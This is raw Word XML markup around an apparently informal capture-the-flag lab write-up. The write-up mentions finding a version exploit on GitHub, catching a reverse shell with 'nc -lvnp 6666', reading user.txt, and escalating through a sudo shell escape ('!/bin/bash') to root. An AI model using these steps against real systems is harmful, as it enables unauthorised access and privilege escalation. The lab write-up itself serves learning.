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5539177" w:rsidR="00843DCE" w:rsidRPr="00D22F4A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550C22" w:rsidRPr="00550C22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sau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B83A525" w:rsidR="00843DCE" w:rsidRPr="00D22F4A" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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22F4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D22F4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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54632CB2" w:rsidR="00843DCE" w:rsidRDefault="00D22F4A" w:rsidP="00843DCE">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00056C08">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://localhost:80</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47145CA4" w14:textId="77777777" w:rsidR="00D22F4A" w:rsidRDefault="00D22F4A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36D67DF6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try to visit the url which provide by the website of ip. Now it redirect to the localhost server where we can see the login is not the clickable. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAB2380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Now see the version detection. And try to find the vulnerability of that version. Which is into the github file that run that command and we obtain it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097DDD3D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Pr="00FC650E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start the server as nc -lvnp 6666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8CC8CBC" w14:textId="4CA515CF" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00C456B6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F2793D5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</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC650E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> start the server as nc -lvnp 6666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5C2DC30" w14:textId="009812A2" w:rsidR="00843DCE" w:rsidRPr="00B56BC4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1C37621F" w14:textId="77777777" w:rsidR="00C456B6" w:rsidRDefault="00C456B6" w:rsidP="00C456B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that shell we obtain user.txt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ADCB3BB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 we find that sudo *** (what we obtain as endpoints)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE7E19A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 provide us the enter something options so write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC6B487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!/bin/bash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0861E2" w14:textId="77777777" w:rsidR="00C456B6" w:rsidRDefault="00C456B6" w:rsidP="00C456B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 now cd /root, find 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550C22"/>
    <w:rsid w:val="00751611"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00B56BC4"/>
    <w:rsid w:val="00C456B6"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D22F4A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6B6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F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2025-12-10T17:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>